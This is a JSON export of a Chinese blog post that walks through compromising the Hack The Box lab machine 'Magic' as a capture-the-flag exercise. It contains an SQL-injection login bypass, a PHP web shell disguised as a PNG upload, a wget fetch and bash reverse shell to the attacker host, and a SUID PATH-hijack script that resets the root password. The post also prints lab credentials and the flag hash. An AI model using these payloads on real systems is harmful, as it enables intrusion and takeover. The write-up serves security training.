{"id":157,"date":"2024-11-13T10:39:06","date_gmt":"2024-11-13T02:39:06","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=157"},"modified":"2024-11-13T10:39:07","modified_gmt":"2024-11-13T02:39:07","slug":"157","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/157\/","title":{"rendered":"HTB\u9776\u673a Magic \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.10.185<\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026\/Documents\/pentest_notes\/magic\/nmap_reports]\n\u2514\u2500# ping -c 4 10.10.10.185\nPING 10.10.10.185 (10.10.10.185) 56(84) bytes of data.\n64 bytes from 10.10.10.185: icmp_seq=1 ttl=63 time=387 ms\n64 bytes from 10.10.10.185: icmp_seq=2 ttl=63 time=1627 ms\n64 bytes from 10.10.10.185: icmp_seq=3 ttl=63 time=101 ms\n64 bytes from 10.10.10.185: icmp_seq=4 ttl=63 time=122 ms\n\n--- 10.10.10.185 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3053ms\nrtt min\/avg\/max\/mdev = 101.359\/559.302\/1627.233\/626.772 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u901a\u4fe1\u72b6\u51b5\u826f\u597d\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.94SVN scan initiated Thu Aug  8 08:38:44 2024 as: nmap -sF -p- --min-rate 2000 -oN .\/fin_result.txt 10.10.10.185\nWarning: 10.10.10.185 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.185 (10.10.10.185)\nHost is up (0.11s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE         SERVICE\n22\/tcp open|filtered ssh\n80\/tcp open|filtered http\n\n# Nmap done at Thu Aug  8 08:39:35 2024 -- 1 IP address (1 host up) scanned in 50.92 seconds<\/code><\/pre>\n
\u9776\u673a\u5f00\u653e\u4e862<\/code>\u4e2aTCP<\/code>\u7aef\u53e3\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Thu Aug  8 08:44:21 2024 as: nmap -sS -sV -A -p 22,80 -oN .\/tcp_result.txt 10.10.10.185\nNmap scan report for 10.10.10.185 (10.10.10.185)\nHost is up (0.11s latency).\n\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)\n|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)\n|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Magic Portfolio\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nAggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using port 443\/tcp)\nHOP RTT       ADDRESS\n1   101.36 ms 10.10.14.1 (10.10.14.1)\n2   102.12 ms 10.10.10.185 (10.10.10.185)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Thu Aug  8 08:44:37 2024 -- 1 IP address (1 host up) scanned in 15.77 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.94SVN scan initiated Thu Aug  8 08:46:35 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_result.txt 10.10.10.185\nWarning: 10.10.10.185 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.185 (10.10.10.185)\nHost is up (0.13s latency).\nAll 65535 scanned ports on 10.10.10.185 (10.10.10.185) are in ignored states.\nNot shown: 65171 open|filtered udp ports (no-response), 364 closed udp ports (port-unreach)\n\n# Nmap done at Thu Aug  8 08:52:37 2024 -- 1 IP address (1 host up) scanned in 362.45 seconds<\/code><\/pre>\n
UDP<\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3aUbuntu Linux<\/code>\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n
\u7aef\u53e3Banner<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/pentest_notes\/magic]\n\u2514\u2500# nc -nv 10.10.10.185 22\n(UNKNOWN) [10.10.10.185] 22 (ssh) open\nSSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673aSSH<\/code>\u670d\u52a1\u53ea\u80fd\u4f7f\u7528\u79c1\u94a5\u8fde\u63a5\u3002<\/p>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u6253\u5f00\u4e3b\u9875\uff1ahttp:\/\/magic.htb\/<\/code><\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u662f\u4e00\u4e2a\u7167\u7247\u5899\u7f51\u7ad9\uff0c\u6700\u5e95\u90e8\u6709\u767b\u5f55\u94fe\u63a5\u548c\u4e00\u4e9b\u4e0d\u660e\u610f\u4e49\u7684\u6587\u672c\uff0c\u800c\u7167\u7247\u5899\u4e0a\u6709\u4e00\u4e9b\u5e26\u6709\u6587\u5b57\u7684\u56fe\u7247\uff1a<\/p>\n
\"\"<\/p>\n
\u8fd8\u53d1\u73b0\u8fd9\u4e9b\u56fe\u7247\u7684\u540d\u5b57\u4f3c\u4e4e\u90fd\u662f\u4e00\u4e32\u54c8\u5e0c\u503c\u7684\u5207\u7247\u3002<\/p>\n
\u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n
# Dirsearch started Thu Aug  8 09:15:35 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/magic.htb\/ -x 400,403,404 -t 60 -e php,js,html,txt,zip,tar.gz,pcap\n\n301   307B   http:\/\/magic.htb\/assets    -> REDIRECTS TO: http:\/\/magic.htb\/assets\/\n301   307B   http:\/\/magic.htb\/images    -> REDIRECTS TO: http:\/\/magic.htb\/images\/\n200     1KB  http:\/\/magic.htb\/login.php\n302     0B   http:\/\/magic.htb\/logout.php    -> REDIRECTS TO: index.php\n302     3KB  http:\/\/magic.htb\/upload.php    -> REDIRECTS TO: login.php<\/code><\/pre>\n
\u672a\u53d1\u73b0\u654f\u611f\u4fe1\u606f\u3002<\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
SQLi\u767b\u5f55\u7ed5\u8fc7<\/h2>\n
\u8bbf\u95eelogin.php<\/code>\uff1a<\/p>\n
\"\"<\/p>\n
\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u672a\u53d1\u73b0\u654f\u611f\u4fe1\u606f\u3002\u5c1d\u8bd5\u4e86\u51e0\u4e2a\u53ef\u80fd\u5f97\u5bc6\u7801\u7ec4\u5408\uff0c\u672a\u6210\u529f\u3002<\/p>\n
\u4f7f\u7528BurpSuite<\/code>\u62e6\u622a\u8bf7\u6c42\u5305\uff0c\u5c1d\u8bd5\u8fdb\u884cSQLi<\/code>\u6ce8\u5165\u6d4b\u8bd5\uff1a<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0POST<\/code>\u8bf7\u6c42\u4e2dusername<\/code>\u548cpassword<\/code>\u53c2\u6570\u5206\u522b\u53d1\u9001\u7528\u6237\u540d\u548c\u5bc6\u7801\u3002\u5c1d\u8bd5\u5728username<\/code>\u5904\u6dfb\u52a0sleep()<\/code>\u8bed\u53e5\uff0c\u672a\u80fd\u6210\u529f\u4f7f\u9875\u9762\u505c\u6b62\u4e00\u6bb5\u65f6\u95f4\uff0c\u4f46\u53d1\u73b0\u539f\u672c\u8f93\u51fa\u5728\u9875\u9762\u5934\u90e8\u7684<script><\/code>\u767b\u5f55\u9519\u8bef\u6807\u7b7e\u6d88\u5931\u4e86\uff1a<\/p>\n
\"\"<\/p>\n
\u63a8\u6d4b\u767b\u5f55\u9875\u5b58\u5728SQLi<\/code>\u6ce8\u5165\u6f0f\u6d1e\uff0c\u4f46\u662f\u9875\u9762\u4e0a\u5927\u6982\u8fc7\u6ee4\u4e86\u62ec\u53f7\u5bfc\u81f4SQL<\/code>\u51fd\u6570\u65e0\u6cd5\u6267\u884c\u3002\u540e\u7aefSQL<\/code>\u8bed\u53e5\u5927\u81f4\u5982\u4e0b\uff1a<\/p>\n
SELECT info FROM db.userlist WHERE username = '{POST_USERNAME}' AND password = '{POST_PASSWORD}'<\/code><\/pre>\n
\u65e2\u7136\u62ec\u53f7\u65e0\u6cd5\u4f7f\u7528\uff0c\u90a3\u5c31\u76f4\u63a5\u8fdb\u884c\u767b\u5f55\u7ed5\u8fc7\uff0c\u5728or<\/code>\u5173\u952e\u5b57\u540e\u52a0true<\/code>\u5373\u53ef\uff08a'+or+true--+-<\/code>\uff09\uff1a<\/p>\n
SELECT info FROM db.userlist WHERE username = 'a'+or+true--+-' AND password = 'b'<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\uff01\uff01\u76f4\u63a5\u8bbf\u95ee<\/strong>upload.php<\/code>\uff1a<\/strong><\/p>\n
\"\"<\/p>\n
\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u5229\u7528<\/h2>\n
\u8fdb\u5165\u8be5\u9875\u9762\u540e\uff0c\u9996\u5148\u5728\u672c\u5730\u9009\u4e2d\u4e00\u5f20\u56fe\u7247\uff0c\u76f4\u63a5\u4e0a\u4f20\uff1a<\/p>\n
\"\"<\/p>\n
\u63a5\u7740\u5728\u4e3b\u9875\u67e5\u770b\u8be5\u56fe\u7247\u662f\u5426\u4f1a\u663e\u793a\uff1a<\/p>\n
\"\"<\/p>\n
\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u83b7\u53d6\u4e86\u8be5\u56fe\u7247\u94fe\u63a5\uff1a<\/p>\n
<article class=\"item thumb span-3\"><h2>1d671f20<\/h2><a href='images\/uploads\/file_upload_test.jpg' class='image'><img src='images\/uploads\/file_upload_test.jpg' alt=''><\/a><\/article><\/code><\/pre>\n
\u4e0a\u4f20\u6210\u529f\uff01\uff01<\/p>\n
\u6839\u636eApache HTTP Server<\/code>\u4ece\u540e\u5f80\u524d\u89e3\u6790\u5408\u6cd5\u6587\u4ef6\u540e\u7f00\u540d\u7684\u7279\u6027\uff0c\u5c1d\u8bd5\u5c06\u56fe\u7247\u7684\u540d\u79f0\u6539\u4e3asphell.php.png<\/code>\uff0c\u5728\u5e76\u5728\u6728\u9a6c\u6587\u4ef6\u5934\u90e8\u8ffd\u52a0PNG<\/code>\u6587\u4ef6\u593489 50 4E 47 0D 0A 1A 0A<\/code>\uff1a<\/p>\n
[Hex: 89 50 4E 47 0D 0A 1A 0A]<?php\n  $command = $_GET['cmd'];\n  if (isset($comamnd) && !empty($command)) {\n    system($command);\n  } else die(\"Hello, hello, I'm sparkle!\");\n?><\/code><\/pre>\n
\"\"<\/p>\n
\u4f46\u6839\u636e\u540e\u7eed\u60c5\u51b5\uff0c\u53d1\u73b0\u9776\u673a\u6709\u5b9a\u65f6\u5220\u9664\u7591\u4f3c\u6728\u9a6c\u6587\u4ef6\u7684\u56fe\u7247\u3002\u4e8e\u662f\u6267\u884cpwd<\/code>\u547d\u4ee4\u4ee5\u83b7\u53d6\u7f51\u7ad9\u8def\u5f84\uff1a<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0\u7f51\u7ad9\u8def\u5f84\u4e3a\/var\/www\/Magic<\/code>\uff0c\u63a5\u7740\u5728\u672c\u5730\u542f\u52a8SimpleHTTPServer<\/code>\uff0c\u5e76\u5c06\u547d\u4ee4\u6539\u4e3a\u5982\u4e0b\u4ee5\u5728\u522b\u5904\u4fdd\u5b58\u6728\u9a6c\uff1a<\/p>\n
wget http:\/\/10.10.14.14\/sparkle.php -O \/var\/www\/Magic\/sparkle.php<\/code><\/pre>\n
\u6267\u884c\u5b8c\u6210\u540e\u4f7f\u7528BurpSuite<\/code>\u8bbf\u95eehttp:\/\/magic.htb\/sparkle.php<\/code>\uff0c\u76f4\u63a5\u53cd\u5f39Shell\uff1a<\/p>\n
\/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.10.14.14\/443 0>&1'<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n
\n
\u6743\u9650\u63d0\u5347<\/h1>\n
\u79fb\u52a8\u81f3theseus\u7528\u6237<\/h2>\n
\u8fdb\u5165\u7cfb\u7edf\u4e4b\u540e\uff0c\u8fdb\u884c\u4fe1\u606f\u9884\u6536\u96c6\uff0c\u5728\/var\/www\/Magic\/db.php5<\/code>\u6587\u4ef6\u5185\u53d1\u73b0MySQL<\/code>\u8fde\u63a5\u51ed\u636e\uff1a<\/p>\n
<?php\nclass Database\n{\n    private static $dbName = 'Magic' ;\n    private static $dbHost = 'localhost' ;\n    private static $dbUsername = 'theseus';\n    private static $dbUserPassword = 'iamkingtheseus';\n\n    private static $cont  = null;\n\n    public function __construct() {\n        die('Init function is not allowed');\n    }\n\n    public static function connect()\n    {\n        \/\/ One connection through whole application\n        if ( null == self::$cont )\n        {\n            try\n            {\n                self::$cont =  new PDO( \"mysql:host=\".self::$dbHost.\";\".\"dbname=\".self::$dbName, self::$dbUsername, self::$dbUserPassword);\n            }\n            catch(PDOException $e)\n            {\n                die($e->getMessage());\n            }\n        }\n        return self::$cont;\n    }\n\n    public static function disconnect()\n    {\n        self::$cont = null;\n    }\n}\n?><\/code><\/pre>\n
    \n
  • \u4e3b\u673a\uff1alocalhost:3306<\/code><\/li>\n
  • \u7528\u6237\u540d\uff1atheseus<\/code><\/li>\n
  • \u5bc6\u7801\uff1aiamkingtheseus<\/code><\/li>\n<\/ul>\n
    \u5c1d\u8bd5\u4f7f\u7528\u8be5\u51ed\u636e\u5207\u6362\u5230theseus<\/code>\u7528\u6237\uff0c\u5931\u8d25\uff0c\u5c1d\u8bd5\u542f\u52a8MySQL<\/code>\u8fdb\u884c\u8fde\u63a5\uff0c\u53d1\u73b0\u9776\u673a\u4e0a\u6ca1\u6709MySQL<\/code>\u5ba2\u6237\u7aef\uff1a<\/p>\n
    \"\"<\/p>\n
    \u76f4\u63a5\u4f7f\u7528SSH<\/code>\u8fdc\u7a0b\u7aef\u53e3\u8f6c\u53d1\u529f\u80fd\u5c06\u9776\u673a3306<\/code>\u53f7\u7aef\u53e3\u8f6c\u53d1\u5230\u653b\u51fb\u673a3306<\/code>\u7aef\u53e3\uff1a<\/p>\n
    ssh -fCNR 3306:localhost:3306 -p 22222 root@10.10.14.14<\/code><\/pre>\n
    \u968f\u540e\u542f\u52a8DBeaver<\/code>\uff0c\u5728\u5f39\u51fa\u7684\u53c2\u6570\u914d\u7f6e\u7a97\u53e3\u4e2d\u586b\u5199\u7528\u6237\u540d\u548c\u5bc6\u7801\uff0c\u8fdb\u884c\u8fde\u63a5\u6d4b\u8bd5\uff1a<\/p>\n
    \"\"<\/p>\n
    \u6210\u529f\uff01<\/p>\n
    \u67e5\u770b\u9776\u673a\u6570\u636e\u5e93\uff0c\u53d1\u73b0\u5728Magic<\/code>\u6570\u636e\u5e93\u4e2d\u6709\u4e00\u5f20\u8868login<\/code>\uff0c\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n
    \"\"<\/p>\n
    \u6210\u529f\u53d1\u73b0\u4e86Web<\/code>\u5e94\u7528\u5e10\u6237admin<\/code>\u7684\u51ed\u636e\uff0c\u5c1d\u8bd5\u5c06\u5176\u7528\u4e8e\u5207\u6362\u7528\u6237\uff1a<\/p>\n
      \n
    • \u7528\u6237\u540d\uff1atheseus<\/code><\/li>\n
    • \u5bc6\u7801\uff1aTh3s3usW4sK1ng<\/code><\/li>\n<\/ul>\n
      \"\"<\/p>\n
      \u6210\u529f\uff01\uff01<\/strong><\/p>\n
      \u4e0b\u4e00\u6b65\u76f4\u63a5\u5207\u6362\u81f3SSH<\/code>\u8fdb\u884c\u64cd\u4f5c\u3002<\/p>\n
      \u672c\u5730\u4fe1\u606f\u6536\u96c6<\/h2>\n
      \u57fa\u672c\u7cfb\u7edf\u4fe1\u606f<\/strong><\/p>\n
      \"\"<\/p>\n
      \u8fdb\u7a0b\u5217\u8868<\/strong><\/p>\n
      \"\"<\/p>\n
      \u8ba1\u5212\u4efb\u52a1\u5217\u8868<\/strong><\/p>\n
      \"\"\"\"<\/p>\n
      \u73af\u5883\u53d8\u91cf<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7528\u6237\u4fe1\u606f<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7528\u6237\u5bb6\u76ee\u5f55<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7279\u6b8a\u6743\u9650\u6587\u4ef6<\/strong><\/p>\n
      \"\"<\/p>\n
      \u5f00\u653e\u7aef\u53e3\u4fe1\u606f<\/strong><\/p>\n
      \"\"<\/p>\n
      \u654f\u611f\u6587\u4ef6\u6743\u9650<\/strong><\/p>\n
      \"\"<\/p>\n
      \u7ecf\u5206\u6790\u7814\u5224\uff0c\u53d1\u73b0\/bin\/sysinfo<\/code>\u7a0b\u5e8f\u6587\u4ef6\u6743\u9650\u4e3a4750<\/code>\uff0c\u5c5e\u4e3b\u4e3aroot:users<\/code>\uff0c\u800c\u5f53\u524d\u7528\u6237theseus<\/code>\u521a\u597d\u5728users<\/code>\u7ec4\u5185\uff0c\u5177\u6709\u5bf9\u8be5\u7a0b\u5e8f\u6267\u884c\u6743\u9650\uff0c\u51b3\u5b9a\u901a\u8fc7\u6b64\u7a0b\u5e8f\u8fdb\u884c\u63d0\u6743<\/p>\n
      SUID Path\u52ab\u6301\u63d0\u6743<\/h2>\n
      \u5c06\/bin\/sysinfo<\/code>\u7a0b\u5e8f\u4e0b\u8f7d\u5230\u672c\u5730\uff0c\u4f7f\u7528IDA Pro<\/code>\u751f\u6210\u4f2a\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
      __int64 __fastcall exec[abi:cxx11](__int64 a1, const char *a2)\n{\n  FILE *v2; \/\/ rax\n  std::runtime_error *exception; \/\/ rbx\n  FILE *v4; \/\/ r12\n  int v5; \/\/ ebx\n  char *v6; \/\/ rax\n  __int64 v7; \/\/ rax\n  int (**v9)(FILE *); \/\/ [rsp+18h] [rbp-B8h] BYREF\n  char v10[16]; \/\/ [rsp+20h] [rbp-B0h] BYREF\n  char v11[136]; \/\/ [rsp+30h] [rbp-A0h] BYREF\n  unsigned __int64 v12; \/\/ [rsp+B8h] [rbp-18h]\n\n  v12 = __readfsqword(0x28u);\n  std::string::basic_string(a1);\n  v9 = &pclose;\n  v2 = popen(a2, \"r\");\n  std::unique_ptr<_IO_FILE,int (*)(_IO_FILE*)>::unique_ptr(v10, v2, &v9);\n  if ( (unsigned __int8)std::unique_ptr<_IO_FILE,int (*)(_IO_FILE*)>::operator bool(v10) != 1 )\n  {\n    exception = (std::runtime_error *)__cxa_allocate_exception(0x10uLL);\n    std::runtime_error::runtime_error(exception, \"popen() failed!\");\n    __cxa_throw(\n      exception,\n      (struct type_info *)&`typeinfo for'std::runtime_error,\n      (void (__fastcall *)(void *))&std::runtime_error::~runtime_error);\n  }\n  while ( 1 )\n  {\n    v4 = (FILE *)std::unique_ptr<_IO_FILE,int (*)(_IO_FILE*)>::get(v10);\n    v5 = std::array<char,128ul>::size(v11);\n    v6 = (char *)std::array<char,128ul>::data(v11);\n    if ( !fgets(v6, v5, v4) )\n      break;\n    v7 = std::array<char,128ul>::data(v11);\n    std::string::operator+=(a1, v7);\n  }\n  std::unique_ptr<_IO_FILE,int (*)(_IO_FILE*)>::~unique_ptr(v10);\n  return a1;\n}\n\nint __fastcall main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rax\n  __int64 v4; \/\/ rax\n  __int64 v5; \/\/ rax\n  __int64 v6; \/\/ rax\n  __int64 v7; \/\/ rax\n  __int64 v8; \/\/ rax\n  __int64 v9; \/\/ rax\n  char v11[40]; \/\/ [rsp+0h] [rbp-40h] BYREF\n  unsigned __int64 v12; \/\/ [rsp+28h] [rbp-18h]\n\n  v12 = __readfsqword(0x28u);\n  setuid(0);\n  setgid(0);\n  v3 = std::operator<<<std::char_traits<char>>(&std::cout, \"====================Hardware Info====================\");\n  std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);\n  exec[abi:cxx11](v11, \"lshw -short\");\n  v4 = std::operator<<<char>(&std::cout, v11);\n  std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);\n  std::string::~string(v11);\n  v5 = std::operator<<<std::char_traits<char>>(&std::cout, \"====================Disk Info====================\");\n  std::ostream::operator<<(v5, &std::endl<char,std::char_traits<char>>);\n  exec[abi:cxx11](v11, \"fdisk -l\");\n  v6 = std::operator<<<char>(&std::cout, v11);\n  std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);\n  std::string::~string(v11);\n  v7 = std::operator<<<std::char_traits<char>>(&std::cout, \"====================CPU Info====================\");\n  std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);\n  exec[abi:cxx11](v11, \"cat \/proc\/cpuinfo\");\n  v8 = std::operator<<<char>(&std::cout, v11);\n  std::ostream::operator<<(v8, &std::endl<char,std::char_traits<char>>);\n  std::string::~string(v11);\n  v9 = std::operator<<<std::char_traits<char>>(&std::cout, \"====================MEM Usage=====================\");\n  std::ostream::operator<<(v9, &std::endl<char,std::char_traits<char>>);\n  exec[abi:cxx11](v11, \"free -h\");\n  std::operator<<<char>(&std::cout, v11);\n  std::string::~string(v11);\n  return 0;\n}<\/code><\/pre>\n
      \u53d1\u73b0\u8be5\u7a0b\u5e8f\u4f7f\u7528\u81ea\u884c\u7f16\u5199\u7684exec()<\/code>\u51fd\u6570\u6267\u884c\u4e86\u4e00\u4e9b\u547d\u4ee4\uff0c\u800c\u547d\u4ee4\u8def\u5f84\u4e3a\u76f8\u5bf9\u8def\u5f84\uff0c\u76f4\u63a5\u5bf9PATH<\/code>\u53d8\u91cf\u8fdb\u884c\u52ab\u6301\u5373\u53ef\uff1a<\/p>\n
      cd ~ && mkdir evil && cd evil\necho \"#! \/bin\/bash\" >> .\/fdisk\necho \"\/usr\/bin\/passwd root\" >> .\/fdisk\nchmod 777 .\/fdisk\nexport PATH=\/home\/theseus\/evil:$PATH\n\/bin\/sysinfo<\/code><\/pre>\n
      \"\"<\/p>\n
      \u76f4\u63a5\u5207\u6362\u5230root<\/code>\u7528\u6237\uff1a<\/p>\n
      su -<\/code><\/pre>\n
      \"\"<\/p>\n
      \u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n
      \n
      Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n
      34d901ccda7d3c1f9a00cf00a27273b5<\/code><\/pre>\n
      \n
      \u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n
      \n","protected":false},"excerpt":{"rendered":"
      \u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.185 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b \u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/\u2026 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-157","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/157","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=157"}],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/157\/revisions"}],"predecessor-version":[{"id":158,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/157\/revisions\/158"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=157"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=157"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=157"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}